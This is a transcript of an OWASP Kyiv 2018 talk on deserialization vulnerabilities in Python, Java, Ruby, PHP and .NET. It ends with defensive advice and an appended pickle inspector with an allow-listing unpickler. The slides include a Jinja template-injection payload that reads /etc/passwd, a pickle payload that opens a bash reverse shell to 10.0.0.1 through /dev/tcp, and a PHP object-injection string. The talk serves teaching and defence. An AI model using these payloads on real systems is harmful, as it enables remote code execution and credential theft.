
Vlada Kulish - Why So Serial?


Threats to Modern Serialization Capabilities.


OWASP Kyiv

March 04, 2018

Transcript

  2. Vlada Kulish, Security Engineer, OWASP Lviv member

  3. What is de/serialization? Why is it important? How it works, and what's the issue. Examples & Demo.
  4. Idea

  5. Types: BINARY (Java, Ruby); READABLE (YAML, XML, JSON); HYBRID (Python, PHP, binary XML/JSON).
  6. Where it is: communicating data between different systems or processes (wire protocols, web services); storing and re-using data (databases, cache servers, file systems); tokens (HTTP cookies, HTML form parameters, API auth tokens).
  7. 2015 - Java deserialization apocalypse

  8. Are other languages safe?

  10. Server-Side Template Injection: the request http://address/injectedData reaches the server, which places the injected data into the template; a payload of {{5*5}} comes back rendered as 25.

  11. Problem: the request URL is formatted into the template source with %, so template syntax in the URL is evaluated by the template engine.

    from flask import request, render_template_string  # imports omitted on the slide

    @app.errorhandler(404)
    def page_not_found(e):
        template = '''{%% extends "layout.html" %%}
    {%% block body %%}
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>
    </div>
    {%% endblock %%}
    ''' % (request.url)
        return render_template_string(template), 404

    Resulting template for a URL containing aaa{{5*5}}:

    {% block body %}
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>aaa{{5*5}}</h3>
    </div>
    {% endblock %}
  12. {{' '.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

  13. {{' '.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} explained: ' '.__class__.__mro__ is [<type 'str'>, <type 'basestring'>, <type 'object'>]; object.__subclasses__() is [<type 'type'>, <type 'weakref'>, …, <type 'file'>, <type 'PyCapsule'>, …].
  14. How it works: type, class, object, subclass, type, params

  15. It's DEMO time :)

  16. Python Pickle: Protocol v.0 - ASCII; Protocol v.1 - old binary format; Protocol v.2 - new binary format.
  17. Pickle Virtual Machine: reconstruct a dict from the contents of the pickle; create a class instance of the pickled object; populate the class instance with the dict elements. Components: instruction engine, stack, memo.
  18. GLOBAL and REDUCE: Global loads a class object onto the PVM stack; Reduce executes the callable.
  19. Overwriting. Old: <Legitimate pickle>. New: <Inserted shellcode>. Result: result of the inserted shellcode, likely an error.
  20. Prepending. Old: <Legitimate pickle>. New: <Shellcode and some empty stack><Legitimate pickle>. Result: original object.
  21. Altering. Old: <Legitimate pickle>…S'<html><h1>AAA…'\n <Legitimate pickle>. New: <Legitimate pickle>…S'<html><h1>Surprise!…'\n <Legitimate pickle>. Result: identically-typed object to the original with an altered attribute value.
  22. Injecting. Old: <Legitimate pickle>…S'<html><body>Foo…'\n <Legitimate pickle>. New: <Legitimate pickle>…S'<html><body> <Instruction returning string>…'\n <Legitimate pickle>. Result: identically-typed object to the original with a new attribute value assigned by the executed instructions.
  23. Limitations: there is no branching instruction; there is no comparison instruction; no exceptions and no error handling; a pickle stream cannot overwrite or directly read itself using Pickle instructions; strings loaded in pickles do not undergo variable substitution; class instances and their methods cannot be directly referenced; only callables present at the top level of a module are candidates for loading into the PVM.
  24. Vulnerable code:

    filename = '/tmp/some_file'
    pickle.load(open(filename, "rb"))

    OR

    def server(skt):
        line = skt.recv(1024)
        obj = pickle.loads(line)
  25. Vulnerable code:

    def server(skt):
        line = skt.recv(1024)
        obj = pickle.loads(line)

    Payload:

    import pickle
    import socket
    import os

    class payload(object):
        def __reduce__(self):
            comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
            return (os.system, (comm,))

    payload = pickle.dumps(payload())
  26. Useful Links
    • http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
    • https://exploit-exercises.com/nebula/level17/
    • https://blog.nelhage.com/2011/03/exploiting-pickle/

  27. JAVA. How to detect: AC ED in hex or rO0 in base64; Java class names in the dump; errors.
  29. Useful Links
    • https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
    • https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
    • https://github.com/frohoff/ysoserial
    • http://jackson.thuraisamy.me/runtime-exec-payloads.html
    • https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
    • https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability

  30. Ruby: CVE-2013-0156, Ruby on Rails XML processor YAML deserialization code execution; CVE-2017-0903, Unsafe Object Deserialization Vulnerability in RubyGems.
  31. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies:

    def reset_password
      user = Marshal.load(Base64.decode64(params[:user])) unless params[:user].nil?
      …
    end

    <div class="content">
      <%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %>
      …
    </div>
  32. Useful Links
    • http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html
    • https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156/
    • http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-vulnerability-explained/
    • https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at-the-rails-yaml-vulnerability/
    • https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Execution
  33. PHP: __destruct(), __wakeup()

  34. PHP:

    if (isset($_COOKIE['leet_hax0r'])) {
        $sess_data = unserialize(base64_decode($_COOKIE['leet_hax0r']));
        …
    }

    a:2:{s:2:"ip";s:15:"IP_addr";i:1;O:3:"SQL":2:{s:5:"query";s:38:"SELECT password AS username FROM users";s:4:"conn";N;}}
  35. Real-life examples: CVE-2015-8562, Joomla Remote Code Execution; CVE-2015-7808, vBulletin 5 Unserialize Code Execution; CVE-2015-2171, Slim Framework PHP Object Injection.
  36. Useful Links
    • https://blog.checkpoint.com/wp-content/uploads/2016/08/Exploiting-PHP-7-unserialize-Report-160829.pdf
    • https://www.owasp.org/index.php/PHP_Object_Injection
    • https://www.tarlogic.com/en/blog/how-php-object-injection-works-php-object-injection/
    • https://pagely.com/blog/2017/05/php-object-injection-insecure-unserialize-wordpress

  37. .Net: CVE-2017-9424, Breeze.Server.NET; CVE-2017-9785, NancyFX Nancy up to 1.4.3/2.0 JSON data Csrf.cs; CVE-2017-9822, DNN (aka DotNetNuke) before 9.1.1 Remote Code Execution.
  38. Useful Links
    • https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf
    • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
    • https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
    • https://blog.scrt.ch/2016/05/12/net-serialiception/

  39. The DEFENCE: avoid magic methods; use formats as simple as possible; do not save session state on the client; use whitelists and blacklists for classes; yes, manually serialize/deserialize complex objects; authentication + encryption; DON'T TRUST DATA - VERIFY IT; use sandboxes.
  40. Thank you! Thanks https://explodingkittens.com/ for good mood and design ideas!
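An added defensive example (not from the deck or its speaker) that ties slides 17-18 (GLOBAL loads a callable, REDUCE executes it on the PVM), slides 24-25 (pickle.loads on untrusted input) and the class whitelist advice on slide 39 together: inspect_pickle walks the opcode stream with pickletools without executing it and reports every module.name reference and every call-style opcode, and RestrictedUnpickler only resolves an allow-list of builtins. The Hook class, the harmless os.getenv callable standing in for the slide's os.system, and the sample data are all constructed for this example.

```python
import builtins
import io
import os
import pickle
import pickletools

# Opcodes that push a string (STACK_GLOBAL, protocol 4+, takes module/name from them)
# and opcodes that invoke something (REDUCE calls the callable loaded by GLOBAL).
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
CALL_OPS = {"REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}
def inspect_pickle(data):
    """Walk the opcode stream without executing it; list imports and call opcodes."""
    found, calls, strings, memo, n_memo, prev = [], [], [], {}, 0, None
    for op, arg, _ in pickletools.genops(data):
        name = op.name
        if name in STRING_OPS:
            strings.append(arg)
        elif name in ("MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"):
            memo[n_memo if name == "MEMOIZE" else arg] = prev  # strings only
            n_memo += name == "MEMOIZE"      # MEMOIZE uses an implicit slot number
        elif name in ("GET", "BINGET", "LONG_BINGET") and memo.get(arg) is not None:
            strings.append(memo[arg])
        elif name == "GLOBAL":               # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif name == "STACK_GLOBAL":         # protocol 4+: module and name on the stack
            found.append((strings[-2], strings[-1]))
        elif name in CALL_OPS:
            calls.append(name)
        prev = arg if name in STRING_OPS else None
    return {"globals": found, "calls": calls}

class RestrictedUnpickler(pickle.Unpickler):
    # Allow-list: GLOBAL may only resolve a few harmless builtins, nothing else.
    def find_class(self, module, name):
        if module == "builtins" and name in {"set", "frozenset", "range", "slice"}:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")

def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
class Hook:
    # Constructed stand-in for the slide's payload class: same GLOBAL + REDUCE
    # shape, but the callable is the harmless os.getenv instead of os.system.
    def __reduce__(self):
        return (os.getenv, ("PATH",))

def sample(hostile, protocol=pickle.DEFAULT_PROTOCOL):
    # Constructed test streams: a plain dict, or the Hook payload above.
    obj = Hook() if hostile else {"user": "alice", "roles": ["admin"], "n": (1, 2)}
    return pickle.dumps(obj, protocol=protocol)
```

Run inspect_pickle on a stream before deciding whether to load it at all, and load anything that passes only through an allow-listing Unpickler rather than pickle.loads.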